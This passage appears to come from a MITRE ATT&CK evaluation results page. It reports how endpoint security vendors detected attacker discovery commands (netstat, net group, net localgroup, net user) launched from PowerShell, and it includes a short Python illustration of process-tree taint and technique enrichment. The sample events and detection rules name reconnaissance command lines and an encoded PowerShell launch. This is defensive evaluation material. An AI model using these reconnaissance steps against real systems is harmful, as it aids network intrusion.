Telemetry showed powershell.exe executing WMI queries that indicated network adapter and configuration information was queried. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Carbon Black
Telemetry
Telemetry within the process tree showed netstat.exe executing with command-line arguments. [1] [2] [3] [4] [5] [6] [7]
Enrichment
The capability enriched netstat.exe with the correct ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5] [6] [7]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The process tree view showed netstat.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7]
Cybereason
Enrichment (Tainted)
The capability enriched netstat.exe executing as Reconnaissance and the correct ATT&CK Technique (System Network Connections Discovery). The data was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6]
Telemetry
Telemetry showed netstat.exe executing with command-line arguments. The telemetry behind each enrichment is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched netstat.exe with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry (Tainted)
An event tree from the suspicious PowerShell process showed a netstat subprocess that was created by WinEnum (tainted by parent PowerShell alerts). Though it does not count as part of the detection, the Interactive Shell could also be used to analyze the PowerShell execution and WinEnum Get-NetInfo-Network Adapters was observed. Interactive Shell was not by itself considered telemetry, but the analyst can retrieve additional Windows Logs to enhance baseline Endgame functionality. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9]
FireEye
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified netstat.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connection Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
F-Secure
Telemetry
Telemetry showed the full contents of the executed Invoke-WinEnum PowerShell function, which includes enumeration of established network connections. [1] [2] [3] [4] [5] [6]
GoSecure
None
No detection capability demonstrated for this procedure. Vendor modified configurations between scenario one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". Alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Telemetry (Tainted)
Telemetry showed invocation of the PowerShell cmdlet Get-NetInfo and subsequent execution of netstat.exe with command-line arguments from powershell.exe. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12]
Palo Alto Networks
Enrichment
The capability enriched powershell.exe executing with command-line arguments with the correct ATT&CK Technique (System Network Connections Discovery). [1] [2] [3] [4] [5]
RSA
Telemetry
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. [1] [2] [3]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing netstat.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4]
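The entries above describe one detection pattern several vendors share: process-creation telemetry shows powershell.exe spawning a discovery binary (netstat.exe here, net.exe in the following step), the child is enriched with an ATT&CK technique, and the result is marked "tainted" when an earlier alert already fired on an ancestor in the same process tree. The following Python is an added illustration of that logic and is not code from MITRE or from any evaluated product. The events are constructed sample data, the parent-alert criterion (powershell.exe run with an encoded command, which the page mentions as the alerting parent) is a simplifying assumption, and the only page-sourced values are the technique IDs T1049 and T1069.

```python
from typing import Dict, List, Optional

# Constructed sample process-creation events (not telemetry from the evaluation).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "wscript.exe",    "cmdline": "wscript.exe update.vbs"},
    {"pid": 300, "ppid": 200, "image": "powershell.exe", "cmdline": "powershell.exe -NoP -enc SQBuAHYAbwBrAGUA"},
    {"pid": 400, "ppid": 300, "image": "netstat.exe",    "cmdline": "netstat -ano"},
    {"pid": 500, "ppid": 300, "image": "net.exe",        "cmdline": "net group /domain"},
    # Same discovery command, but launched from a chain with no alerting ancestor.
    {"pid": 600, "ppid": 100, "image": "netstat.exe",    "cmdline": "netstat -ano"},
]

# Enrichment rules: (child image, required command-line substring, technique ID, name).
# An empty substring matches any command line. IDs are those cited on the page.
ENRICHMENT_RULES = [
    ("netstat.exe", "",      "T1049", "System Network Connections Discovery"),
    ("net.exe",     "group", "T1069", "Permission Groups Discovery"),
]


def is_parent_alert(event: dict) -> bool:
    """Stand-in for the 'parent PowerShell alert' the page describes.

    Assumption: the alert fires on powershell.exe started with an encoded command.
    A real product would use its own, richer alert logic here.
    """
    return event["image"].lower() == "powershell.exe" and " -enc" in event["cmdline"].lower()


def index_by_pid(events: List[dict]) -> Dict[int, dict]:
    return {e["pid"]: e for e in events}


def tainting_ancestor(event: dict, by_pid: Dict[int, dict], max_depth: int = 32) -> Optional[int]:
    """Walk the parent chain and return the pid of the first ancestor that raised an alert.

    Returns None when the chain ends (unknown parent) or no ancestor alerted.
    max_depth guards against malformed telemetry with ppid cycles.
    """
    ppid = event["ppid"]
    for _ in range(max_depth):
        parent = by_pid.get(ppid)
        if parent is None:
            return None
        if is_parent_alert(parent):
            return parent["pid"]
        ppid = parent["ppid"]
    return None


def enrich(events: List[dict]) -> List[dict]:
    """Tag discovery children with an ATT&CK technique and a tainted/untainted category."""
    by_pid = index_by_pid(events)
    findings = []
    for e in events:
        for image, needle, technique_id, name in ENRICHMENT_RULES:
            if e["image"].lower() != image or needle not in e["cmdline"].lower():
                continue
            taint = tainting_ancestor(e, by_pid)
            findings.append({
                "pid": e["pid"],
                "image": e["image"],
                "technique": technique_id,
                "name": name,
                "category": "Enrichment (Tainted)" if taint is not None else "Enrichment",
                "tainted_by": taint,
            })
    return findings


if __name__ == "__main__":
    for f in enrich(SAMPLE_EVENTS):
        print(f"pid {f['pid']:>4} {f['image']:<12} {f['technique']} {f['name']} "
              f"-> {f['category']} (tainted_by={f['tainted_by']})")
```

On the constructed events, pids 400 and 500 are reported as tainted by the alerting powershell.exe ancestor (pid 300), while pid 600 gets the same technique enrichment without taint, which is the distinction the evaluation draws between "Enrichment" and "Enrichment (Tainted)".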
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
An alert for Enumeration of Administrator Account provided enrichment to the net group command (tainted by parent PowerShell alerts). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Domain Admins Reconnaissance Command and Net Group Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery) and a suspicious indicator that the net utility was used to obtain information about user groups. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery) and a suspicious indicator that the net utility was used to obtain information about domain admins. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". The alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as an enumeration command. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net localgroup was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched net.exe with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Enrichment (Tainted)
An alert for Enumeration of Administrator Account provided enrichment to the net group command (tainted by parent PowerShell alerts). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net1.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
GoSecure
Enrichment (Configuration Change, Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the conditions Net Group Reconnaissance Command and Net LocalGroup Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The condition contributing to Enrichment was added to the capability's detection after the start of the evaluation, so the detection is identified as a configuration change. See Configuration page for details. [1] [2] [3] [4] [5] [6]
McAfee
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and Technique (Permission Groups Discovery) and a suspicious indicator that the net utility was used to obtain information about user groups. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". The alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
Enrichment (Tainted)
The capability enriched the execution of net.exe and net1.exe as the possible enumeration of administrator groups. The data was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5]
Carbon Black
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Enrichment (Delayed, Tainted)
The capability enriched the event with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used to capture information about local users. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
General Behavior
A General Behavior alert was generated showing that a spawned process (net.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The vendor modified configurations between scenarios one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery) and a related Technique (System Owner/User Discovery) and a suspicious indicator that the net utility was used to obtain information about user groups. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". The alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Telemetry
Telemetry within the process tree showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (T1069 - Permission Groups Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
CrowdStrike
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net user was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Cybereason
Telemetry
Telemetry showed net.exe executing with command-line arguments. For most alerts in the user interface, the telemetry behind it is separately available in the capability. This is counted as a separate detection because the functionality was shown to MITRE throughout the evaluation, though a screenshot was not taken in this instance. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Account Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Endgame
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments (tainted by parent PowerShell alerts). Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
Enrichment (Delayed, Tainted)
The capability enriched the event with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). The enrichment was tainted by parent PowerShell alerts. Telemetry is immediately available within the event tree and then can be enriched with ATT&CK Techniques and Tactics, so this is counted as two detections. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10]
FireEye
Enrichment
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The Managed Defense Report indicated a General Behavior occurred because it identified net.exe as a reconnaissance command used. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
F-Secure
General Behavior
A General Behavior alert was generated showing that a spawned process (net.exe) has been tagged for monitoring because its parent process has a detection (powershell.exe). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6] [7] [8] [9]
GoSecure
Enrichment (Tainted)
The capability showed powershell.exe executing net.exe with command-line arguments and enriched the command with the condition Net User Reconnaissance Command. The enrichment was tainted by the parent Script File Created alert. The vendor modified configurations between scenarios one and two, but MITRE assesses the change did not significantly affect results for this detection. See Configuration page for details. [1] [2] [3] [4] [5]
McAfee
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe. The telemetry was tainted by a trace detection on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9]
Enrichment
The capability enriched net.exe with the correct ATT&CK Tactic (Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9]
Microsoft
Telemetry (Tainted)
Telemetry showed the execution sequence for powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by a prior suspicious PowerShell cmdlet alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Specific Behavior (Delayed)
A delayed Specific Behavior alert called "Reconnaissance using directory services queries" was generated for domain user enumeration. The vendor noted this was an Azure Advanced Threat Protection alert. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
General Behavior (Delayed)
A delayed General Behavior alert was generated for "Suspicious sequence of exploration activities". The alert is based on the correlation of a chain of related behaviors across multiple steps. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15]
Palo Alto Networks
Enrichment
The capability enriched net.exe executing with command-line arguments with the correct ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed powershell.exe executing net with command-line arguments. The telemetry was tainted by a parent alert on wscript.exe. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
RSA
Telemetry
Telemetry showed powershell.exe executing net.exe with command-line arguments. [1] [2] [3] [4]
SentinelOne
Telemetry (Tainted)
Telemetry showed powershell.exe executing net.exe with command-line arguments. The telemetry was tainted by the alert generated during initial compromise because it was associated with the same story (Group ID). [1] [2] [3] [4] [5] [6] [7] [8]
Carbon Black
Telemetry
Telemetry showed a process tree containing net.exe with command-line arguments. [1] [2] [3] [4] [5] [6]
Enrichment
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery). [1] [2] [3] [4] [5] [6]
CrowdStrike
Enrichment (Tainted)
The capability enriched net.exe with a related ATT&CK Technique (Account Discovery) and the correct Tactic (Discovery). The process tree view showed the enrichment was tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
General Behavior (Delayed)
The OverWatch team sent an email indicating a General Behavior was observed because net group was part of additional malicious discovery performed. OverWatch is the managed threat hunting service. The team sent emails to MITRE to mimic what they would send in a real incident. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Telemetry (Tainted)
Telemetry showed net.exe executing with command-line arguments. The process tree view showed net.exe as tainted by a previous powershell.exe detection. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]
Cybereason
General Behavior (Tainted)
A General Behavior alert was generated for net.exe conducting suspicious activity related to Discovery/Privilege Escalation as well as being a descendant of a suspicious process. The alert was also tagged with the correct ATT&CK Tactic (Discovery) and Technique (Remote System Discovery). The alert was tainted by a parent PowerShell alert. [1] [2] [3] [4] [5] [6] [7] [8]
Telemetry
